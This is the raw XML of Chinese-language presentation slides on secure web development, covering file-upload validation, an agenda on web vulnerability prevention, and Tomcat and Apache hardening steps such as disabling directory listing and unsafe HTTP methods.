                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>上传处理服务端对文件类型进行二次校验。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>文件上传到服务器之后，如果是属于临时文件，则在业务逻辑处理完成之后，将该原始文件删除。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>还有其他文件上传方式（比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>彩信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的上行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>附件，就不能放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>路径下）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11212" y="0"/>
            <a:ext cx="9043988" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>校验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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505569" y="67470"/>
            <a:ext cx="8229600" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29699" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="775533" y="2996952"/>
            <a:ext cx="6911975" cy="547688"/>
            <a:chOff x="500063" y="1023938"/>
            <a:chExt cx="6911975" cy="547687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29701" name="AutoShape 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="500063" y="1023938"/>
              <a:ext cx="6911975" cy="547687"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFE0A9"/>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="FFFFFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFE0A9"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:rou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右箭头 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="625428" y="1071559"/>
              <a:ext cx="446139" cy="500066"/>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6350">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
            <a:scene3d>
              <a:camera prst="obliqueTopLeft"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="72000" tIns="72000" rIns="0" bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1062871" y="769285"/>
            <a:ext cx="6624637" cy="3939540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200">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安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开发概述</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="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a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>银行应用检测项目漏洞统计</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重要及多发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞成因与防范</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marL="457200" lvl="2">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="&amp;"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  平台部署与维护具体措施</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="660033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用服务器配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用配置</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>403</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通用处理页面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>管理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="660033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="1071563"/>
            <a:ext cx="8786812" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>线上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>禁用自带的管理应用以及示例应用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>禁止列表显示文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>下禁止不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TRACE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>等协议）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>配置非超级用户不能修改应用目录内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>配置禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目录访问显示文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>增强</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
